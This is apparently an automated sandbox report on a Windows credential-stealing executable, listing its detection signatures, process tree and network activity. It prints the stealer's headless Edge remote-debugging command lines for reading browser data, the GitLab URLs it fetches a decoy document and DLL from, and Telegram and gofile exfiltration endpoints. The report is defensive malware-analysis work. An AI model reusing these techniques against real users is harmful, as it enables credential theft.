Windows Analysis Report
hJ1bl8p7dJ.exe

Overview

General Information

Sample name: hJ1bl8p7dJ.exe
renamed because original name is a hash value
Original sample name: ddefa728f5ff2f70fd097609edc4e918afd5fa212115ba2b06f818c1263df23f.exe
Analysis ID: 1590664
MD5: 73d8502f47e5c7b9b4851ee47692105c
SHA1: 98efc25148a119cbe7d9b421d4eff9d784c70dcb
SHA256: ddefa728f5ff2f70fd097609edc4e918afd5fa212115ba2b06f818c1263df23f
Tags: bot7711615259, exe, user-JAMESWT_MHT

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Yara detected Telegram Recon
AI detected suspicious sample
Drops password protected ZIP file
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • hJ1bl8p7dJ.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\hJ1bl8p7dJ.exe" MD5: 73D8502F47E5C7B9B4851EE47692105C)
    • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msedge.exe (PID: 7872 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8068 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1600 --field-trial-handle=1472,i,8808784561077415658,3538669664059517056,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • WINWORD.EXE (PID: 7408 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • msedge.exe (PID: 2880 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9230 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 1884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1604 --field-trial-handle=1412,i,17015067578929256214,2434644396816959813,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
hJ1bl8p7dJ.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security |

Source | Rule | Description | Author | Strings
Process Memory Space: hJ1bl8p7dJ.exe PID: 7760 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

      System Summary

      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program 
Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\hJ1bl8p7dJ.exe", ParentImage: C:\Users\user\Desktop\hJ1bl8p7dJ.exe, ParentProcessId: 7760, ParentProcessName: hJ1bl8p7dJ.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-w
      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, 
NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\hJ1bl8p7dJ.exe", ParentImage: C:\Users\user\Desktop\hJ1bl8p7dJ.exe, ParentProcessId: 7760, ParentProcessName: hJ1bl8p7dJ.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-w
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2025-01-14T13:12:21.301042+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49722 | 172.65.251.78 | 443 | TCP
      2025-01-14T13:13:11.587466+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50003 | 172.65.251.78 | 443 | TCP
      2025-01-14T13:13:14.172851+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50005 | 104.26.12.205 | 443 | TCP
      2025-01-14T13:13:14.781271+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50006 | 104.26.12.205 | 443 | TCP
      2025-01-14T13:13:15.302916+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50007 | 208.95.112.1 | 80 | TCP
      2025-01-14T13:13:15.973074+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50008 | 104.26.12.205 | 443 | TCP
      2025-01-14T13:13:16.568106+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50009 | 104.26.12.205 | 443 | TCP
      2025-01-14T13:13:17.044295+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50010 | 208.95.112.1 | 80 | TCP

      AV Detection

      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.7% probability
      Source: unknown, HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.11:49722 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.11:50005 version: TLS 1.2
      Source: hJ1bl8p7dJ.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: hJ1bl8p7dJ.exe
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: System.IO.Compression.ni.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: hJ1bl8p7dJ.exe
      Source: global traffic, HTTP traffic detected: GET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1, Host: gitlab.com
      Source: global traffic, HTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1, Host: gitlab.com
      Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, Host: api.ipify.org
      Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, Host: api.ipify.org
      Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, Host: api.ipify.org
      Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, Host: api.ipify.org
      Source: global traffic, HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1, Host: ip-api.com
      Source: global traffic, HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1, Host: ip-api.com
      Source: Joe Sandbox View, IP Address: 208.95.112.1 208.95.112.1
      Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknown, DNS query: name: api.ipify.org
      Source: unknown, DNS query: name: api.ipify.org
      Source: unknown, DNS query: name: ip-api.com
      Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50007 -> 208.95.112.1:80
      Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50010 -> 208.95.112.1:80
      Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49722 -> 172.65.251.78:443
      Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50003 -> 172.65.251.78:443
      Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50006 -> 104.26.12.205:443
      Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50005 -> 104.26.12.205:443
      Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50008 -> 104.26.12.205:443
      Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50009 -> 104.26.12.205:443
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic, DNS traffic detected: DNS query: gitlab.com
      Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
      Source: global traffic, DNS traffic detected: DNS query: ip-api.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000003.1584069385.0000025112145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.m
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1901449352.0000025112101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1901449352.0000025112101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.o
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Y
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: hJ1bl8p7dJ.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.micro
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/i
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://aka.ms/binaryformatter
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://aka.ms/dotnet-illink/com
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://aka.ms/dotnet-warnings/
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/servers
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/serversY
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.org
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgY
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902568203.00007FF7D2A51000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/boti
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E09A000.00000004.00001000.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E053000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/dotnet/efcore
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/dotnet/runtime
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawX
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawd
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
      Source: hJ1bl8p7dJ.exeString found in binary or memory: https://github.com/mono/linker/issues/1187
